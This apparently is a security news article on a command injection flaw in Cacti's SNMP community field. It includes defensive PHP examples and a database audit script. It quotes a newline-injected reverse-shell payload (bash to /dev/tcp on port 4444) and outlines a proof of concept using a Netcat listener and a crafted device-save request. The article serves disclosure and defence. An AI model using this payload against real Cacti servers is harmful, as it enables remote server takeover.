A serious command injection vulnerability in Cacti, a popular open-source network monitoring tool, allows authenticated attackers to execute arbitrary commands remotely.
Rated high severity by TheWitness in the GitHub advisory GHSA-c7rr-2h93-7gjf, the flaw affects versions up to and including 1.2.28.
Users should update to the patched 1.2.29 release immediately to prevent potential server compromise.
Published last week on GitHub, the vulnerability stems from poor input validation in Cacti’s SNMP device configuration.
Authenticated users can craft malicious SNMP community strings with newline characters, which get stored directly in the database without sanitization.
When Cacti later passes these strings to its command-line SNMP helpers, the newline ends the intended command and whatever follows it runs as a separate command, giving remote code execution (RCE) with the web server's privileges.
Vulnerability Technical Details
Cacti processes device configurations via the host.php?action=save endpoint. The attacker targets the snmp_community field, which is read with get_nfilter_request_var('snmp_community'). That function applies no filtering, so control characters such as newlines (\n) and shell metacharacters reach the application untouched.
The input then passes to api_device_save():
```php
$save['snmp_community'] = form_input_validate(
    $snmp_community,
    'snmp_community',
    '', // Empty regex disables filtering
    true,
    3
);
```
No escaping or truncation occurs, so a payload such as public\nbash -c 'bash -i >& /dev/tcp/127.0.0.1/4444 0>&1'\n# is stored verbatim in the host table; the trailing # comments out whatever Cacti appends after the community string.
The next SNMP operation against that device (for example, opening it under Management > Devices) executes the injected command wherever the SNMP wrapper treats the newline as a command boundary.
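To make the bug class concrete, here is an added illustration that is not Cacti's own code: a save path that, like the empty-regex form_input_validate() call above, accepts control characters, beside a hardened variant that rejects them, and a shell command line built by plain concatenation beside one built with escapeshellarg(). The function names, the host 192.0.2.10 and the sysDescr.0 query are assumptions, and the command construction is a generic illustration rather than Cacti's actual SNMP wrapper; the payload is the one quoted above.

```php
<?php
// Added illustration (not Cacti's code) of the bug class described above:
// a community string that keeps control characters is later dropped into
// a shell command line. Function names, host and OID are hypothetical.

declare(strict_types=1);

// Mirrors the behaviour the article attributes to form_input_validate()
// with an empty regex: any value is accepted unchanged.
function save_snmp_community_unfiltered(string $community): string
{
    return $community;
}

// Hardened variant: reject ASCII control characters (NUL, LF, CR, ...)
// and DEL before the value ever reaches the database.
function save_snmp_community_hardened(string $community): ?string
{
    if (preg_match('/[\x00-\x1F\x7F]/', $community) === 1) {
        return null; // caller treats null as a validation failure
    }
    return $community;
}

// Unsafe construction: plain concatenation, no quoting at all.
function build_snmpget_unsafe(string $community, string $host): string
{
    return 'snmpget -v2c -c ' . $community . ' ' . $host . ' sysDescr.0';
}

// Safe construction: escapeshellarg() single-quotes the value, so a
// newline inside it stays part of the argument instead of ending the command.
function build_snmpget_safe(string $community, string $host): string
{
    return 'snmpget -v2c -c ' . escapeshellarg($community) . ' '
        . escapeshellarg($host) . ' sysDescr.0';
}

// Would /bin/sh -c run this string as more than one command?
// Minimal POSIX-shell model: a newline outside single quotes ends a
// command; a backslash outside quotes escapes the next character.
function spans_multiple_commands(string $cmdline): bool
{
    $inQuote = false;
    for ($i = 0, $n = strlen($cmdline); $i < $n; $i++) {
        $c = $cmdline[$i];
        if ($inQuote) {
            if ($c === "'") {
                $inQuote = false;
            }
        } elseif ($c === '\\') {
            $i++; // skip the escaped character
        } elseif ($c === "'") {
            $inQuote = true;
        } elseif ($c === "\n") {
            return true;
        }
    }
    return false;
}

// Payload from the article (constructed input; the host is a documentation address).
$payload = "public\nbash -c 'bash -i >& /dev/tcp/127.0.0.1/4444 0>&1'\n#";
$host    = '192.0.2.10';

$stored = save_snmp_community_unfiltered($payload);
echo 'unsafe command splits: ';
var_export(spans_multiple_commands(build_snmpget_unsafe($stored, $host)));
echo "\nescaped command splits: ";
var_export(spans_multiple_commands(build_snmpget_safe($stored, $host)));
echo "\nhardened save of payload: ";
var_export(save_snmp_community_hardened($payload));
echo "\nhardened save of 'public': ";
var_export(save_snmp_community_hardened('public'));
echo "\n";
```

The two defences are independent and both belong in a real fix: rejecting control characters at the form keeps the bad value out of the database entirely, while quoting at the point of command construction protects against values that arrive by other routes (imports, API calls, an already-poisoned table).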
Here’s a summary of affected and patched versions:
| Component | Affected Versions | Patched Version | Severity |
|---|---|---|---|
| Cacti (PHP) | <= 1.2.28 | 1.2.29 | High |
A proof-of-concept (PoC) demonstrates the attack: start a Netcat listener (nc -lvnp 4444), then POST a crafted request to host.php?action=save that creates a device with the malicious snmp_community.
Opening the device's page in Cacti's interface triggers the SNMP query, and the listener receives a shell.
Impact and Mitigation Steps
This flaw poses severe risks in typical deployments. Attackers gain arbitrary command execution as the Cacti process user, usually www-data or apache.
Consequences include data tampering, file writes, lateral movement, or complete server takeover, especially where Cacti drives command-line SNMP wrappers such as Net-SNMP.
Cacti maintainers fixed the issue in 1.2.29 by sanitizing the input in host.php. Administrators should:
- Upgrade to 1.2.29 or later.
- Review SNMP community strings in the database for anomalies (SELECT * FROM host WHERE snmp_community LIKE '%\n%'; MySQL and MariaDB expand the \n inside the literal unless NO_BACKSLASH_ESCAPES is set; CHAR(10) works regardless).
- Restrict authenticated access to device management.
- Monitor logs for suspicious SNMP activity.
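As an added example of the database review step (not code from the Cacti project or the advisory), the following script classifies stored community strings by the kind of suspicious content they carry. The rows are constructed, AUDIT_SQL is the MySQL/MariaDB query you would run to fetch real candidates in place of them, and the function names are hypothetical.

```php
<?php
// Added example (not Cacti's code): audit stored SNMP community strings for
// the control characters this flaw relies on, plus shell metacharacters worth
// a second look. Rows below are constructed; function names are hypothetical.

declare(strict_types=1);

// Query for real data. [[:cntrl:]] matches every ASCII control character,
// so it also catches tabs, CR and ESC, not just the newline in the article's LIKE.
const AUDIT_SQL = "SELECT id, hostname, snmp_community FROM host "
    . "WHERE snmp_community REGEXP '[[:cntrl:]]'";

// Return a list of findings for one community string (empty list = looks clean).
function classify_community(string $community): array
{
    $findings = [];
    if (preg_match('/[\r\n]/', $community) === 1) {
        $findings[] = 'line-break';
    }
    if (preg_match('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]/', $community) === 1) {
        $findings[] = 'other-control-char';
    }
    // Not exploitable via the newline bug by itself, but worth review if the
    // value is ever concatenated into a shell command without quoting.
    if (preg_match('/[;&|`$(){}<>\\\\]/', $community) === 1) {
        $findings[] = 'shell-metachar';
    }
    return $findings;
}

// Run the classifier over result rows; key the report by host id.
function audit_hosts(array $rows): array
{
    $suspicious = [];
    foreach ($rows as $row) {
        $findings = classify_community($row['snmp_community']);
        if ($findings !== []) {
            $suspicious[$row['id']] = [
                'hostname' => $row['hostname'],
                'findings' => $findings,
                // JSON-encode so the operator sees "\n" rather than a real line break.
                'value'    => json_encode($row['snmp_community'], JSON_UNESCAPED_SLASHES),
            ];
        }
    }
    return $suspicious;
}

// Constructed sample rows standing in for the result of AUDIT_SQL.
$rows = [
    ['id' => 1, 'hostname' => 'core-sw1', 'snmp_community' => 'public'],
    ['id' => 2, 'hostname' => 'edge-fw',  'snmp_community' => "public\nid > /tmp/pwned\n#"],
    ['id' => 3, 'hostname' => 'lab-box',  'snmp_community' => 'r3ad;only'],
];

foreach (audit_hosts($rows) as $id => $info) {
    printf("host id %d (%s): %s value=%s\n", $id, $info['hostname'],
        implode(',', $info['findings']), $info['value']);
}
```

Treat a line-break finding as an indicator of compromise and check who last edited that device and when; a shell-metachar finding on its own is usually a legitimate but awkward community string and only needs review.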
No in-the-wild exploitation is known yet, but Internet-exposed Cacti instances (over 100,000 per Shodan) tend to draw attention quickly.
The case is another reminder of the risk unfiltered user input poses in PHP applications, particularly when that input later reaches a shell.